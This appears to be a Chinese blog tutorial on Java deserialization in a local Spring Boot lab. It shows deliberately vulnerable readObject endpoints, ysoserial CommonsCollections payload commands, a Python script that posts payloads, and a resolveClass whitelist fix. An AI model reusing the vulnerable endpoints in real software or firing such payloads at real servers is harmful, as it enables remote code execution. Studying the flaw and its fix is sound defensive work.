web java反序列化例子与修复建议

最新推荐文章于 2024-01-03 14:19:03 发布
最新推荐文章于 2024-01-03 14:19:03 发布
阅读量748 收藏
点赞数
分类专栏: 安全 文章标签: 反序列化 安全漏洞 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34101364/article/details/110251403
版权

文章目录

搭环境

每次搭环境总是能遇到千奇百怪的问题,真是服了。
1、下载springboot demo,当然,IDEA直接创建spring boot也可以,参见我前期教程,不要搞太新的,依赖包会出问题:
在这里插入图片描述
2、解压,使用idea打开,idea需要配置mvn的国内源,查看setting.xml的存放路径
在这里插入图片描述
然后在相应路径创建setting.xml,有则覆盖,配置如下:

<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/SETTINGS/1.0.0
                      http://maven.apache.org/xsd/settings-1.0.0.xsd">
  <localRepository/>
  <interactiveMode/>
  <usePluginRegistry/>
  <offline/>
  <pluginGroups/>
  <servers/>
  <mirrors>
    <mirror>
     <id>aliyunmaven</id>
     <mirrorOf>central</mirrorOf>
     <name>aliyunpublice</name>
     <url>https://maven.aliyun.com/repository/central</url>
    </mirror>
    <mirror>
      <id>repo1</id>
      <mirrorOf>central</mirrorOf>
      <name>central repo</name>
      <url>http://repo1.maven.org/maven2/</url>
    </mirror>
    <mirror>
     <id>aliyunmaven</id>
     <mirrorOf>apache snapshots</mirrorOf>
     <name>aliyunapache</name>
     <url>https://maven.aliyun.com/repository/apache-snapshots</url>
    </mirror>
  </mirrors>
  <proxies/>
  <activeProfiles/>
  <profiles>
    <profile>  
        <repositories>
           <repository>
                <id>aliyunmaven</id>
                <name>aliyunmaven</name>
                <url>https://maven.aliyun.com/repository/public</url>
                <layout>default</layout>
                <releases>
                        <enabled>true</enabled>
                </releases>
                <snapshots>
                        <enabled>true</enabled>
                </snapshots>
            </repository>
            <repository>
                <id>MavenCentral</id>
                <url>http://repo1.maven.org/maven2/</url>
            </repository>
            <repository>
                <id>aliyunmavenApache</id>
                <url>https://maven.aliyun.com/repository/apache-snapshots</url>
            </repository>
        </repositories>             
     </profile>
  </profiles>
</settings>

3、项目搭建
创建一个SerializeController:
在这里插入图片描述
内容如下,第一个执行本地反序列化文件,第二个函数执行远程反序列化流:

// by 5wimming
package com.wimming.springproject;

import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;

import javax.servlet.http.HttpServletRequest;
import java.io.BufferedInputStream;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.util.ArrayList;

@RestController
@RequestMapping("/ser")
public class SerializeController {
    @RequestMapping("/loc")
    public String byLoc() throws IOException, ClassNotFoundException {
        FileInputStream fis = new FileInputStream("/Users/all/program/tools/ysoserial/poc.ser");
        ObjectInputStream ois = new ObjectInputStream(fis);
        ois.readObject();
        ois.close();
        return "loc success";
    }

    @RequestMapping(value = "/byte", method = RequestMethod.POST)
    public String byByte(HttpServletRequest request) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
        ois.readObject();
        ois.close();
        return "loc success";
    }

}

其中poc.ser,使用如下命令生成

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "open /System/Applications/Calculator.app" >poc.ser  //mac
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "calc.exe" >poc.ser  //windows

yso下载:
链接: https://pan.baidu.com/s/1lN2ngR5BxWJ6h89wd7Fxuw 密码: emvf

怼它

启动idea
访问http://127.0.0.1:8080/ser/loc,发现弹出了计算器
在这里插入图片描述
也可以直接发送字节流,这里使用python,直接从内存中读取payload,防止编码问题:

# by 5wimming
import requests
import subprocess
import time


def yso_input_stream():
    target = "http://127.0.0.1:8080/ser/byte"
    p = subprocess.Popen(
        'java -jar /Users/all/program/tools/ysoserial/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 \"open /System/Applications/Calculator.app\"',
        shell=True, stdout=subprocess.PIPE)
    out, err = p.communicate()
    r = requests.post(target, data=out)
    print(r.text)


if __name__ == '__main__':
    yso_input_stream()

上面python脚本建议收藏,能帮你避开很多编码的坑。
在这里插入图片描述

修复

修复方法很多,这里举一个白名单的修复方法,直观简单,还能看看反序列化链。

创建一个CheckObjectInputStreamUtils类,用于检测反序列化过程中用到的类:
在这里插入图片描述

// by 5wimming
package com.wimming.springproject;

import java.io.*;
import java.util.Collection;
import java.util.HashSet;

public class CheckObjectInputStreamUtils extends ObjectInputStream {
    private HashSet<String> classes = new HashSet<>();

    public CheckObjectInputStreamUtils(BufferedInputStream in) throws IOException {
        super(in);
    }

    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        String name = desc.getName();
        if(!isSafeClass(name)){
            System.out.println("classNames not illegal. {}, classNames are {}".format(name, classes));
            throw new ClassNotFoundException();
        }
        return super.resolveClass(desc);

    }

    public void addSafeClass(Collection<String> names){
        classes.addAll(names);
    }

    private boolean isSafeClass(String name){
        return classes.contains(name);
    }
}

在SerializeController中新建一个方法loc1,并且将String类加入白名单,修改后记得重启idea:

// by 5wimming
package com.wimming.springproject;

import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;

import javax.servlet.http.HttpServletRequest;
import java.io.BufferedInputStream;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.util.ArrayList;

@RestController
@RequestMapping("/ser")
public class SerializeController {
    @RequestMapping("/loc")
    public String byLoc() throws IOException, ClassNotFoundException {
        FileInputStream fis = new FileInputStream("/Users/rym/all/program/tools/ysoserial/poc.ser");
        ObjectInputStream ois = new ObjectInputStream(fis);
        ois.readObject();
        ois.close();
        return "loc success";
    }

    @RequestMapping("/loc1")
    public String byLoc1() throws IOException, ClassNotFoundException {
        FileInputStream fis = new FileInputStream("/Users/rym/all/program/tools/ysoserial/poc.ser");
        CheckObjectInputStreamUtils objectInputStream = new CheckObjectInputStreamUtils(new BufferedInputStream(fis));
        ArrayList<String> classNames = new ArrayList<>();
        classNames.add("java.lang.String");
//        classNames.add("javax.management.BadAttributeValueExpException");
//        classNames.add("java.lang.Exception");
//        classNames.add("java.lang.Throwable");
//        classNames.add("[Ljava.lang.StackTraceElement;");
//        classNames.add("java.lang.StackTraceElement");
//        classNames.add("java.util.Collections$UnmodifiableList");
//        classNames.add("java.util.Collections$UnmodifiableCollection");
//        classNames.add("java.util.ArrayList");
//        classNames.add("org.apache.commons.collections.keyvalue.TiedMapEntry");
//        classNames.add("org.apache.commons.collections.map.LazyMap");
//        classNames.add("org.apache.commons.collections.functors.ChainedTransformer");
//        classNames.add("[Lorg.apache.commons.collections.Transformer;");
//        classNames.add("org.apache.commons.collections.functors.ConstantTransformer");
//        classNames.add("java.lang.Runtime");
//        classNames.add("org.apache.commons.collections.functors.InvokerTransformer");
//        classNames.add("[Ljava.lang.Object;");
//        classNames.add("[Ljava.lang.Class;");
//        classNames.add("java.lang.Object");
//        classNames.add("[Ljava.lang.String;");
//        classNames.add("java.lang.Integer");
//        classNames.add("java.lang.Number");
//        classNames.add("java.util.HashMap");
        objectInputStream.addSafeClass(classNames);
        objectInputStream.readObject();
        objectInputStream.close();
        return "loc success";
    }

    @RequestMapping(value = "/byte", method = RequestMethod.POST)
    public String byByte(HttpServletRequest request) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
        ois.readObject();
        ois.close();
        return "loc success";
    }

}

然后再访问链接http://127.0.0.1:8080/ser/loc1,发现报错
在这里插入图片描述
看看idea控制台,发现拦截了很多”恶意类“:
在这里插入图片描述
把这些类加入白名单,也就是将函数byLoc1中的注释取消掉,再访问链接http://127.0.0.1:8080/ser/loc1
在这里插入图片描述
发现胡汉三又回来了。

当然,白名单的方法也有个缺陷,万一你把带有命令执行的类(或者通过该类作为跳板,可以调用其他可以导致命令执行的类)加进去了,那就game over了,不过如果是自己写的类,黑盒测试是很难发现的。

5wimming
关注
专栏目录
Java反序列化漏洞修复方案
卉鱼程序人生
04-18 9567
据Oracle、Cert及我们自测,受影响版本包括但不限于: - 9.2.3.0 - 9.2.4.0 - 10.0.0.0 - 10.0.1.0 - 10.0.2.0 - 10.2.6.0 - 10.3.0.0 - 10.3.1.0 - 10.3.2.0 - 10.3.3.0 - 10.3.4.0 - 10.3.5.0 - 10.3.6.0 - 12.1.1.0 - 1
day3-java反序列化&php反序列化靶场&之前漏洞复习
m0_70099896的博客
11-22 976
查看服务器操作系统版本,web中间件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞。查看旁站有没有通用性的cms或者其他漏洞,如果存在cms,则可以针对CMS的版本进行相关的漏洞利用。对于一些特殊的网站,还可以尝试社会工程学攻击,比如伪造邮箱链接钓鱼,伪造短信或者电话骗取验证码等等。查看IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,比如:ftp,ssh,弱口令等等。如果确实找到了一些安全的问题则向相关的负责人反馈,提出修复建议。首先获取网站的域名,查看是否有子域名。
修复weblogic的JAVA反序列化漏洞的多种方法--预防GetShell攻击
既是过河之卒,惟有奋力向前。
06-15 1442
0x00 前言 目前oracle还没有在公开途径发布weblogic的JAVA反序列化漏洞的官方补丁,目前看到的修复方法无非两条: 使用SerialKiller替换进行序列化操作的ObjectInputStream类; 在不影响业务的情况下,临时删除掉项目里的 “org/apache/commons/collections/functors/InvokerTransformer.cl...
java 反序列化实例demo
u011767040的博客
10-22 657
Java序列化是将一个对象编码成一个字节流,反序列化将字节流编码转换成一个对象。 序列化是Java中实现持久化存储的一种方法;为数据传输提供了线路级对象表示法。 Java的序列化机制是通过在运行时判断类的serialVersionUID来验证版本一致性的。在进行反序列化时,JVM会把传来的字节流中的serialVersionUID与本地相应实体(类)的serialVersionUID进行比较
Java反序列化修复方案
weixin_34062329的博客
06-21 565
1)下载与当前大版本相同的commons-collections包(原来是3.2.x就替换为3.2.2,原来是4.x就替换为4.4.1) 下载链接:http://commons.apache.org/proper/commons-collections/download_collections.cgi     2)解压出其中的commons-collections-x.x.x.jar     3)...
修复Weblogic的JAVA反序列化漏洞的多种方法
adrninistrat0r的博客
03-03 1642
1. 前言 2016年发在乌云知识库,重新发出来纪念一下。 常见的weblogic的JAVA反序列化漏洞修复方法如下: 1.使用SerialKiller替换进行序列化操作的ObjectInputStream类; 2.在不影响业务的情况下,临时删除掉项目里的 "org/apache/commons/collections/functors/InvokerTransformer.class"文件。 ...
SerializationUtils:Java对象序列化与反序列化的终极武器(专家级教程)
Java对象序列化与反序列化基础 在Java编程中,对象序列化是一个核心概念,它指的是将对象状态信息转换为可以存储或传输的形式的过程。反序列化则是序列化的逆过程,即将这些存储或传输的形式还原为Java对象。这在...
Java序列化与反序列化深度探讨:对象持久化的5大技术
Java序列化与反序列化是处理这些问题的关键机制。**Java序列化**是将对象状态转换为可保持(例如,存到文件、数据库或通过网络发送)或传输的过程。而**反序列化**则是将这些数据恢复为对象的过程。在本章中,我们将...
悬镜安全丨Java 反序列化任意代码执行漏洞分析与利用
Anprou的博客
11-14 5954
利用国内的漏洞利用工具
Java Map持久化存储指南:掌握序列化与反序列化技术
[Java Map持久化存储指南:掌握序列化与反序列化技术](https://media.geeksforgeeks.org/wp-content/uploads/20210418135216/HowtoConvertMaptoJSONtoHashMapinJava.jpg) # 1. Java Map持久化存储概述 Java Map持久...
反序列化漏洞原理、成因、危害、攻击、防护、修复方法
白帽子凯哥聊黑客
12-23 6938
首先,我们定义一个简单的Java类,该类具有可序列化的属性。// 标准的getter和setter方法 public String getUsername() {} }// 标准的getter和setter方法 public String getUsername() {} }// 标准的getter和setter方法。
JAVA反序列化漏洞修复解决方法
05-05 2987
MyObject类建立了Serializable模块,而且重新写过了readObject()变量,仅有建立了Serializable模块的类的目标才能够被实例化,沒有建立此模块的类将无法使他们的任意状态被实例化或逆实例化。这儿的readObject()方法的功能是以1个源键入流中载入字节数编码序列,再把他们反序列化为1个目标,并将其回到,readObject()是能够重新写过的,因而能够订制反序...
Java反序列化漏洞修复
Dove_Knowledge的博客
10-27 1846
1、jar包反编译(JD-GUI) 2、反编译后的进行代码审核,看是否有前端payload中的数据直接被反序列化(如果Java应用对用户输入,即不可信数据做了反序列化处理,那么攻击者可以通过构造恶意输入,让反序列化产生非预期的对象,非预期的对象在产生过程中就有可能带来任意代码执行。) 3、修复方案 (1)重写 ObjectInputStream#resolveClass 方法resolveClass 会在 readObject 前自动触发,我们可以通过重写 resolveClass 来读取类名,判断使
WEB漏洞-反序列化JAVA
硫酸超的博客
08-27 906
WEB漏洞-反序列化JAVA定义用途应用场景Java中的序列化和反序列化API实现简单测试代码writeObject()Serializable和Externalizable序列化ID的作用漏洞原理漏洞挖掘漏洞触发场景挖掘方法发现&利用-WebGoat&Ysoserial 定义 序列化 (Serialization):将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对 象将其当前状态写入到临时或持久性存储区。 反序列化:从存储区中读取该数据,并将其还原为对象的过程,称为反序
Web进阶漏洞-------JAVA反序列化(1)
Swee
08-04 220
反序列化定义 Java 中对象的序列化就是将对象转换成二进制序列 使用ObjectOutputStream的**writeObject()**方法实现序列化 反序列化则是将二进制序列转换成对象。 使用ObjectOutputStream的**readbject()**实现反序列化 为什么要进行反序列化? 举个例子,我们在淘宝上订购了一个书桌,商家不可能把整个桌子都通过物流公司发送到顾客家中。桌子要被分解为众多部分,以散件的形式发送到顾客的手上。 序列化条件 类中必须实现java.io中Ser..
Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
黑白的博客
12-06 521
声明 好好学习,天天向上 漏洞描述 Oracle 2018年4月补丁中,修复Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 影响范围 Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2 Weblogic 12.2.1.3 这里使用10.3.6.0版本 使用vulhub cd /app/vulhub-mas
PHP反序列化漏洞利用及修复,示例代码讲解
最新发布
白帽子凯哥聊黑客
01-03 1707
您提到的PHP反序列化漏洞是一个重要的网络安全问题。在我的网络安全工程师的角色下,我可以提供关于此问题的深入分析。PHP反序列化漏洞通常发生在当不可信的数据被反序列化时。序列化是将数据结构或对象状态转换为可存储或可传输的格式的过程,而反序列化则是将这些格式转换回原始的数据结构或对象。在PHP中,如果反序列化的数据被恶意篡改,攻击者可以执行任意代码,导致应用程序或系统的安全风险。:当应用程序将不可信的数据传递给函数时,可能产生反序列化漏洞。这可能导致对象注入攻击。
Java反序列化漏洞的发现和修复
VioletHan7的博客
11-13 403
http://admin.code2sec.com/ji-yi-ci-javafan-xu-lie-hua-lou-dong-de-fa-xian-he-xiu-fu.html
java反序列化漏洞修复_Weblogic Java反序列化漏洞修复2
weixin_36356040的博客
03-08 213
漏洞描述简单来说序列化是将对象状态转换为可保持或传输的格式的过程(bytestream)。与序列化相对的是反序列化,它将流(bytestream)转换为对象。这两个过程结合起来,可以轻松地存储和传输数据平常状况下正常的数据流被反序列化的时候产生的是预期的正常的对象。但是当在进行反序列化的时候,被反序列化的数据是被经过恶意静心构造的,此时反序列化之后就会产生非预期的恶意对象。这个时候就可能引起任意代...
Java对象序列化与反序列化深度解析
本文将深入探讨Java对象序列化和反序列化的核心概念及其在实际开发中的应用。首先,我们回顾了Java中数据流处理的背景,特别提到使用DataOutputStream对对象属性逐个写入和读取的繁琐过程。为了简化这种操作,Java...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值